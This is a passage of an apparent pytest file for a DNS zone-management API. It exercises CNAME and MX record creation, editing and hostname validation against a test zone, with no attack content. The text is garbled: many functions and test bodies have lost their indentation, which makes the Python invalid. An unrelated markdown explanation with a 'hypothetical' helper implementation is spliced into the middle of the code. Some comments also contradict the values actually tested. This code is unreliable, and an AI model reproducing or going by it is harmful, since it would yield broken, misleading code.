        json_send = utils.get_model("add", data)
        res = self.post_data(client, endpoint, json_send, headers)
        tmp = json.loads(res.data.decode('utf8'))
        id_content = tmp['message']['id']

        dataset['id_ttldata'] = id_ttldata
        dataset['id_content'] = id_content
        dataset['id_record'] = id_record
        try:
            self.identity['content'].append(dataset)
        except Exception:
            if not self.identity:
                self.generate_empty_data()
            self.identity['content'].append(dataset)
        return dataset
    def add_content_serial(self, client, content_serial, id_record, headers):
        dataset = dict()
        endpoint = 'content_serial'
        data = {"id_record": id_record, "nm_content_serial": content_serial}
        json_send = utils.get_model('add', data)
        res = self.post_data(client, endpoint, json_send, headers)
        tmp = json.loads(res.data.decode('utf8'))
        id_content_serial = tmp['message']['id']
        dataset['id_content_serial'] = id_content_serial
        dataset['id_record'] = id_record
        try:
            self.identity['content_serial'].append(dataset)
        except Exception:
            if not self.identity:
                self.generate_empty_data()
            self.identity['content_serial'].append(dataset)
        return dataset
    def add_error_record(self, client, nm_record, type_, headers):
        url = 'record'
        id_type = self.record_type[type_.lower()]
        data = {"id_zone": self.identity['zone']['id_zone'],
                "nm_record": nm_record, "id_type": id_type,
                "date_record": "2019220207"}
        send_data = utils.get_model("add", data)
        res = self.post_data(client, url, send_data, headers)
        return res
def edit_content_data(self,client,id_content,id_record,new_content,headers):
fields = {"fields": {"nm_content": new_content}}
tags = {"tags":{"id_content": id_content}}
send_data = {"edit": {**fields, **tags}}
res = self.post_data(client,'content',send_data,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = self.post_data(client,'sendcommand',data,headers)
return res
def edit_ttldata(self,client,id_ttldata,new_ttl,id_record,headers):
fields = {"fields": {"id_ttl": new_ttl,"id_record": id_record}}
tags = {"tags": {"id_ttldata": id_ttldata}}
send_data = {"edit": {**fields, **tags}}
res = self.post_data(client,'ttldata',send_data,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = self.post_data(client,'sendcommand',data,headers)
return res
def edit_record(self,client,id_record,new_data,headers):
fields = {
"nm_record": new_data["nm_record"],
"date_record": new_data["date_record"],
"id_zone": new_data["id_zone"],
"id_type": new_data["id_type"]
}
fields = {"fields" : fields}
tags = {"tags": {"id_record": id_record}}
send_data = {"edit": {**fields, **tags}}
res = self.post_data(client,'record',send_data,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = self.post_data(client,'sendcommand',data,headers)
return res
def edit_serial_data(self,client,headers,id_content_serial,id_record,new_content_serial):
fields = { "nm_content_serial": new_content_serial}
fields = {"fields" : fields}
tags = {"tags": {"id_content_serial": id_content_serial}}
send_data = {"edit": {**fields, **tags}}
res = self.post_data(client,'content_serial',send_data,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = self.post_data(client,'sendcommand',data,headers)
return res
    def teardown(self, client, headers):
        id_zone = self.identity['zone']['id_zone']
        id_records = self.identity['records']
        for i in id_records:
            data = {"cluster-unset-master": {"tags": {"id_zone": str(id_zone)}}}
            self.post_data(client, 'sendcommand', data, headers)
            data = {"cluster-unset-slave": {"tags": {"id_zone": str(id_zone)}}}
            self.post_data(client, 'sendcommand', data, headers)
            data = {"conf-unset": {"tags": {"id_zone": id_zone}}}
            self.post_data(client, 'sendcommand', data, headers)
        data = {'id_zone': id_zone}
        send_data = utils.get_model('remove', data)
        self.post_data(client, 'zone', send_data, headers)
    def add_content_data_fail(self, client, content, id_record, headers):
        endpoint = 'ttldata'
        data = {"id_record": id_record, "id_ttl": "402428126292705281"}
        json_send = utils.get_model("add", data)
        res = self.post_data(client, endpoint, json_send, headers)
        tmp = json.loads(res.data.decode('utf8'))
        id_ttldata = tmp['message']['id']

        endpoint = 'content'
        data = {"id_ttldata": id_ttldata, "nm_content": content}
        json_send = utils.get_model("add", data)
        res = self.post_data(client, endpoint, json_send, headers)
        tmp = json.loads(res.data.decode('utf8'))
        assert tmp['status'] == 'error'

    def add_content_serial_fail(self, client, content_serial, id_record, headers):
        endpoint = 'content_serial'
        data = {"id_record": id_record, "nm_content_serial": content_serial}
        json_send = utils.get_model("add", data)
        res = self.post_data(client, endpoint, json_send, headers)
        tmp = json.loads(res.data.decode('utf8'))
        assert tmp['status'] == 'error'
    def teardown_record(self, client, id_record, headers):
        data = {"zone-unset": {"tags": {"id_record": id_record}}}
        self.post_data(client, 'sendcommand', data, headers)
        data = {"id_record": id_record}
        data = utils.get_model("remove", data)
        self.post_data(client, 'record', data, headers)
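`utils.get_model` itself is not shown in this file; from its call sites it appears to wrap row data in a per-action envelope. A hypothetical stand-in (the real RESTKnot helper may differ) could look like:

```python
def get_model(action, data, tags=None):
    """Hypothetical stand-in for utils.get_model: wrap `data` in the
    {action: {"fields"/"tags": ...}} envelope the API endpoints expect."""
    if action in ("where", "remove"):
        # lookups and deletes send only match tags
        return {action: {"tags": data}}
    if tags is not None:
        # edits send new field values plus tags selecting the row
        return {action: {"fields": data, "tags": tags}}
    # inserts send field values only
    return {action: {"fields": data}}
```

For example, `get_model("add", {"domain": "x.xyz"})` would yield `{"add": {"fields": {"domain": "x.xyz"}}}`, matching the `{"edit": {"fields": ..., "tags": ...}}` payloads built by hand in the edit helpers above.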
class TestValidation:
    testset = list()

    def post_data(self, client, endpoint, data, headers):
        url = 'api/' + endpoint
        res = client.post(url, data=json.dumps(data),
                          content_type='application/json', headers=headers)
        return res

    def assert_hostname(self, respons, expected, zone):
        result_ = json.loads(respons.data.decode('utf8'))
        try:
            result = result_['data']['data']
        except Exception:
            print(result_)
        zn_knot = zone + "."
        hostnames = list(result[zn_knot].keys())
        assert expected in hostnames
        return result[zn_knot][expected]

    def assert_error(self, respons, expected, zone):
        result = json.loads(respons.data.decode('utf8'))

    def assert_value(self, respons, expected, record_type):
        try:
            data = respons[record_type.upper()]
        except Exception:
            data = respons[record_type.lower()]
        data = data['data']
        assert expected in data
def test_validation_hostname(self,client,get_header):
####################### CNAME ######################
record_type = 'cname'
headers = get_header
test_data = DataTest()
self.testset.append(test_data)
res = test_data.add_zone(client,"wetestzone.xyz",headers)
assert res.status_code == 200
########## hostname : @ , content: wetestzone.xyz
res = test_data.add_record(client,"@",record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,'wetestzone.xyz',id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,'wetestzone.xyz.',nm_zone)
self.assert_value(respons,'wetestzone.xyz.wetestzone.xyz.',record_type)
test_data.teardown_record(client,id_record,headers)
############## hostname : wetestzone.xyz , content : wetestzone.xyz.
res = test_data.add_record(client,"wetestzone.xyz",record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,'wetestzone.xyz.',id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
res=self.assert_hostname(res,'wetestzone.xyz.wetestzone.xyz.',nm_zone)
self.assert_value(res,'wetestzone.xyz.',record_type)
data = {"zone-unset":{"tags":{"id_record" : id_record}}}
self.post_data(client,'sendcommand',data,headers)
data = {"id_record": id_record}
data = utils.get_model("remove",data)
res=self.post_data(client,'record',data,headers)
test_data.teardown_record(client,id_record,headers)
# ##### hostname : www , content: @
# res = test_data.add_record(client,"www",record_type,headers)
# assert res.status_code == 200
# res = json.loads(res.data.decode('utf8'))
# id_record = res['message']['id']
# res = test_data.add_content_data(client,'@',id_record,headers)
# data = {"zone-insert": {"tags":{"id_record": id_record}}}
# res = test_data.post_data(client,'sendcommand',data,headers)
# res = json.loads(res.data.decode('utf8'))
# # ZONE READ
# id_zone = test_data.identity['zone']['id_zone']
# data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
# res = test_data.post_data(client,'sendcommand',data,headers)
# nm_zone = test_data.identity['zone']['nm_zone']
# res=self.assert_hostname(res,'www.wetestzone.xyz.',nm_zone)
# self.assert_value(res,'wetestzone.xyz.',record_type)
# test_data.teardown_record(client,id_record,headers)
##### hostname : a.b.c content: mail.google.com
res = test_data.add_record(client,"a.b.c",record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,'mail.google.com',id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
res=self.assert_hostname(res,'a.b.c.wetestzone.xyz.',nm_zone)
self.assert_value(res,'mail.google.com.wetestzone.xyz.',record_type)
test_data.teardown_record(client,id_record,headers)
##### hostname : a.b.c content: mail.google.com
res = test_data.add_record(client,"a.b.c",record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,'mail.google.com',id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
res=self.assert_hostname(res,'a.b.c.wetestzone.xyz.',nm_zone)
self.assert_value(res,'mail.google.com.wetestzone.xyz.',record_type)
test_data.teardown_record(client,id_record,headers)
##### hostname : A-0c content: mail.google.com.
res = test_data.add_record(client,"a-0c",record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,'mail.google.com.',id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
res=self.assert_hostname(res,'a-0c.wetestzone.xyz.',nm_zone)
self.assert_value(res,'mail.google.com.',record_type)
test_data.teardown_record(client,id_record,headers)
##### hostname : 0--0 content: mail.google.com.
res = test_data.add_record(client,"0--0",record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,'store.cobadns08.xyz',id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
res=self.assert_hostname(res,'0--0.wetestzone.xyz.',nm_zone)
self.assert_value(res,'store.cobadns08.xyz.wetestzone.xyz.',record_type)
test_data.teardown_record(client,id_record,headers)
########## hostname : @ , content: store.cobadns08.xyz.
res = test_data.add_record(client,"@",record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,'store.wetestzone.xyz.',id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,'wetestzone.xyz.',nm_zone)
self.assert_value(respons,'store.wetestzone.xyz.',record_type)
test_data.teardown_record(client,id_record,headers)
########## hostname : @ , content: abc.wetestzone.xyz
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'abc.wetestzone.xyz'
expected_content_value = 'abc.wetestzone.xyz.wetestzone.xyz.'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content_value,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_value,record_type)
test_data.teardown_record(client,id_record,headers)
########## hostname : @ , content: abc.wetestzone.xyz.
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'abc.wetestzone.xyz.'
expected_content_value = 'abc.wetestzone.xyz.'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content_value,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_value,record_type)
test_data.teardown_record(client,id_record,headers)
########## hostname : @ , content: mail
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'mail'
expected_content_value = 'mail.wetestzone.xyz.'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content_value,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_value,record_type)
test_data.teardown_record(client,id_record,headers)
########## hostname : @ , content: A-0c
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'A-0c'
expected_content_value = 'a-0c.wetestzone.xyz.'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content_value,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_value,record_type)
test_data.teardown_record(client,id_record,headers)
########## hostname : @ , content: o12345670123456701234567012345670123456701234567012345670123456
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'o12345670123456701234567012345670123456701234567012345670123456'
expected_content_value = 'o12345670123456701234567012345670123456701234567012345670123456.wetestzone.xyz.'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content_value,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_value,record_type)
test_data.teardown_record(client,id_record,headers)
########## FAILURE hostname : @ , content: -A0c
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = '-A0c'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
########## FAILURE hostname : @ , content: A0c-
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'A0c-'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
########## FAILURE hostname : @ , content: A.-0c
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'A.-0c'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
########## FAILURE hostname : @ , content: A-.0c
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'A-.0c'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
########## FAILURE hostname : @ , content: o123456701234567012345670123456701234567012345670123456701234567
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'o123456701234567012345670123456701234567012345670123456701234567'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
########## FAILURE hostname : www.
hostname_ = 'www.'
expected_hostname = 'wetestzone.xyz.'
content_value = 'o123456701234567012345670123456701234567012345670123456701234567'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : mail.cobadns08.xyz.
hostname_ = 'mail.cobadns08.xyz.'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : *
hostname_ = '*'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : -A0c
hostname_ = '-A0c'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : A0c-
hostname_ = 'A0c-'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : A.-0c
hostname_ = 'A.-0c'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : A-.0c
hostname_ = 'A-.0c'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : o123456701234567012345670123456701234567012345670123456701234567
hostname_ = 'o123456701234567012345670123456701234567012345670123456701234567'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## hostname : @ , content: abc.wetestzone.xyz. EDITING RECORD
hostname_ = '@'
expected_hostname = 'test.wetestzone.xyz.'
content_value = 'abc.wetestzone.xyz.'
expected_content_value = 'bvrtan.wetestzone.xyz.'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content_value,id_record,headers)
id_content = res['id_content']
id_ttldata = res['id_ttldata']
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
## EDIT DATA
res = test_data.edit_ttldata(client,id_ttldata,'402428102489735169',id_record,headers)
assert res.status_code == 200
res = test_data.edit_content_data(client,id_content,id_record,'bvrtan.wetestzone.xyz.',headers)
assert res.status_code == 200
new_data = {
"nm_record" : "test",
"id_type" : "402427533112147969",
"id_zone": id_zone,
"date_record": "20190707"
}
res = test_data.edit_record(client,id_record,new_data,headers)
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_value,record_type)
test_data.teardown_record(client,id_record,headers)
test_data.teardown(client,headers)
self.testset.remove(test_data)
def test_mx(self,client,get_header):
record_type = 'mx'
priority = '10'
headers = get_header
test_data = DataTest()
self.testset.append(test_data)
res = test_data.add_zone(client,"wetestzone.xyz",headers)
assert res.status_code == 200
########## hostname : @ , content: wetestzone.xyz
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'wetestzone.xyz'
expected_content_serial = priority + ' wetestzone.xyz.wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
########## hostname : wetestzone.xyz , content : wetestzone.xyz.
hostname = 'wetestzone.xyz'
expected_hostname = 'wetestzone.xyz.wetestzone.xyz.'
content_serial = 'wetestzone.xyz.'
expected_content_serial = priority + ' wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
##### hostname : www , content: @
hostname = 'www'
expected_hostname = 'www.wetestzone.xyz.'
content_serial = '@'
expected_content_serial = priority + ' wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
##### hostname : a.b.c content: mail.google.com
hostname = 'a.b.c'
expected_hostname = 'a.b.c.wetestzone.xyz.'
content_serial = 'mail.google.com'
expected_content_serial = priority + ' mail.google.com.wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
##### hostname : A-0c content: mail.google.com.
hostname = 'A-0c'
expected_hostname = 'a-0c.wetestzone.xyz.'
content_serial = 'mail.google.com.'
expected_content_serial = priority + ' mail.google.com.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
##### hostname : 0--0 content: mail.google.com.
hostname = '0--0'
expected_hostname = '0--0.wetestzone.xyz.'
content_serial = 'mail.google.com.'
expected_content_serial = priority + ' mail.google.com.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
########## hostname : @ , content: store.wetestzone.xyz.
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'store.wetestzone.xyz.'
expected_content_serial = priority + ' store.wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
########## hostname : @ , content: abc.wetestzone.xyz
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'abc.wetestzone.xyz'
expected_content_serial = priority + ' abc.wetestzone.xyz.wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
########## hostname : @ , content: abc.wetestzone.xyz.
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'abc.wetestzone.xyz.'
expected_content_serial = priority + ' abc.wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
